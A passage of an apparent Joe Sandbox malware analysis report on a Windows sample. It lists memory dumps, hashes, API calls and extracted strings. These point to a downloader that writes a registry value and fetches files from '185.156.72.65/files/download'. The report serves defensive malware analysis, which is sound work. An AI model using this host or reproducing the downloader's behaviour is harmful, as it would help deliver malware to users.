                        • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                        • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                        • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 795ce4d5db040fe7b2670f22b5c42f9535ba4be31fe7cac5747439c07610cab3
                        • Instruction ID: 3162a93822651030013cfd1b0b8a031ca16124ca1060970b9da85eb71985d6cb
                        • Opcode Fuzzy Hash: 795ce4d5db040fe7b2670f22b5c42f9535ba4be31fe7cac5747439c07610cab3
                        • Instruction Fuzzy Hash: 7BC1DEB3F106254BF3544978DCA83A26683DBD5324F2F82798E18ABBC5DD7E8D095384
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b2d9c5febe006f0d65a44a417e5e8a508d5c7830f743731935974e8b25fc2fb
                        • Instruction ID: ef3ca434e617e905d60d546a774afffe6db61fe8b3e148e167f2e0624312daf6
                        • Opcode Fuzzy Hash: 1b2d9c5febe006f0d65a44a417e5e8a508d5c7830f743731935974e8b25fc2fb
                        • Instruction Fuzzy Hash: CCA1AEF7F506254BF3944879DC983626582D7A5320F2F42388FA8AB7C6DCBE5D065384
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc44dbd5c630dac6c9b1a29de68d75b6483f932b79fc972efcbf5d78b73ff21e
                        • Instruction ID: ae5f5f49748f8c8d9f3ba456470f87cdb2d9ce20f9f3c60a0ddcee940c277048
                        • Opcode Fuzzy Hash: dc44dbd5c630dac6c9b1a29de68d75b6483f932b79fc972efcbf5d78b73ff21e
                        • Instruction Fuzzy Hash: 3A716AB3F512224BF3544879CD583A2668397D5320F3F82798A5CABBC5DDBE4D0A5384
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa0af5d9f0c274996ab38a2b9082a1e1bb8723b3ba52b4819f224f7e4fa6d0d0
                        • Instruction ID: 85db9778a69d6c359d3ee4fa4b6bc6f00db14e3382dd386afe92789216cd99d7
                        • Opcode Fuzzy Hash: aa0af5d9f0c274996ab38a2b9082a1e1bb8723b3ba52b4819f224f7e4fa6d0d0
                        • Instruction Fuzzy Hash: 9371EEF3F516254BF3440A28DCA93627692DBA5320F2F01BD8E59AB3C2D97E5E0593C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c993dfcd7b9414fe059675356f3c0351196a93939db204e71a9b295cdb8a096e
                        • Instruction ID: 3a4053cd7ecc5b6df29484da356bc9db21ae31b340041868f2eb99ced90f3cfc
                        • Opcode Fuzzy Hash: c993dfcd7b9414fe059675356f3c0351196a93939db204e71a9b295cdb8a096e
                        • Instruction Fuzzy Hash: FB51C0B2A0C7008FE3046F29EC8576AFBE9FF94720F16893DD6C487744E67858418B82
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94a7bf68871dd8c781ea6fff48605ffc2abce53e42e139ab3c4d051b031fea43
                        • Instruction ID: 24e7b203e6789462283b2a44cefaf85d5b011ea16196b6eba8c87f8c4e1add18
                        • Opcode Fuzzy Hash: 94a7bf68871dd8c781ea6fff48605ffc2abce53e42e139ab3c4d051b031fea43
                        • Instruction Fuzzy Hash: 5651D4F39083109BE3046E29EC8536AFBE5EF98360F17893DDAC497784E63458458AC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee6ee58fc4200fcd9ae3d1f6129cfea77c8f21504085c19d8665a3511c24e48a
                        • Instruction ID: bfe4b03a4387e04c1b436b5175b51f8b8113250021b469b946bc0e587e2244bb
                        • Opcode Fuzzy Hash: ee6ee58fc4200fcd9ae3d1f6129cfea77c8f21504085c19d8665a3511c24e48a
                        • Instruction Fuzzy Hash: EC5128B3E082109FE3046E2DDD5577ABBD6DBC4330F2A463DEA9587384E9795C058782
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78210a8a613c3996315c5175b5af49ee0f721d0e1bffe9670397edaddce69db2
                        • Instruction ID: f2459b9f3fed13e1d032a9557076d6a748f5ada52150134f2c563181ac03ed4e
                        • Opcode Fuzzy Hash: 78210a8a613c3996315c5175b5af49ee0f721d0e1bffe9670397edaddce69db2
                        • Instruction Fuzzy Hash: 23318DB3F012254BF3888C35CDA83626683ABD5300F2B817D8B4A5B7C5DC7D1D099384
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                        • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                        • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                        Strings
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                        • kernel32.dll, xrefs: 00409C00
                        • SleepConditionVariableCS, xrefs: 00409C11
                        • WakeAllConditionVariable, xrefs: 00409C1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 2565136772-3242537097
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                        • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                        • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                        • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0493C081
                        • ___TypeMatch.LIBVCRUNTIME ref: 0493C18F
                        • _UnwindNestedFrames.LIBCMT ref: 0493C2E1
                        • CallUnexpected.LIBVCRUNTIME ref: 0493C2FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        APIs
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenSleepValue
                        • String ID: 185.156.72.65$185.156.72.65$mixone
                        • API String ID: 4111408922-485810328
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04939E22), ref: 04939E50
                        • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04939E22), ref: 04939E5B
                        • GetModuleHandleW.KERNEL32(0042000C,?,?,04939E22), ref: 04939E6C
                        • GetProcAddress.KERNEL32(00000000,00420028), ref: 04939E7E
                        • GetProcAddress.KERNEL32(00000000,00420044), ref: 04939E8C
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04939E22), ref: 04939EAF
                        • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04939ECB
                        • CloseHandle.KERNEL32(0042D060,?,?,04939E22), ref: 04939EDB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID:
                        • API String ID: 2565136772-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                          • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                        • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65$string too long
                        • API String ID: 2123813255-2459586365
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 0040B837
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                        • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                        • _ValidateLocalCookies.LIBCMT ref: 0040B948
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        APIs
                        • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                        • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        APIs
                        • GetLastError.KERNEL32(?,?,0493BC22,0493B1C6,0493A9D7), ref: 0493BC39
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0493BC47
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0493BC60
                        • SetLastError.KERNEL32(00000000,0493BC22,0493B1C6,0493A9D7), ref: 0493BCB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 0493186C
                          • Part of subcall function 04939AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04939AF5
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049318A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049318D9
                        • Concurrency::cancel_current_task.LIBCPMT ref: 049319EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65
                        • API String ID: 2123813255-1765470537
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8F925C9F,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                        • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        APIs
                        • __alloca_probe_16.LIBCMT ref: 004150D5
                        • __alloca_probe_16.LIBCMT ref: 0041519E
                        • __freea.LIBCMT ref: 00415205
                          • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        • __freea.LIBCMT ref: 00415218
                        • __freea.LIBCMT ref: 00415225
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04932D5F
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04932D74
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04932D82
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04932D9D
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04932DBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                        • String ID:
                        • API String ID: 2509773233-0
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004013BB
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 2296764815-3011832937
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04931622
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 4132704954-3011832937
                        • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction ID: aa2d1b6e0c986c3ca5647a3a311f188172e8752b98b06ac89f094f8ca670318c
                        • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction Fuzzy Hash: A52177B0F003448BE730DF79EC067A9B3A0FB56308FA48279D8445B271DBB52986CB09
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                        • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                        • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                        APIs
                        • GetConsoleOutputCP.KERNEL32(8F925C9F,00000000,00000000,00000000), ref: 0041972F
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                        • GetLastError.KERNEL32 ref: 00419A6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                        • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                        APIs
                        • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04949996
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04949BE8
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04949C2E
                        • GetLastError.KERNEL32 ref: 04949CD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction ID: 617a67e78cc148dde137d8e82add0848fe4a6fdbd55459ce306b5621ec415725
                        • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction Fuzzy Hash: 7FD16CB5E002489FDB15CFE8D8809EEBBF9FF89314F18456AE45AEB351D630A941CB50
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04931C6C
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04931C8F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
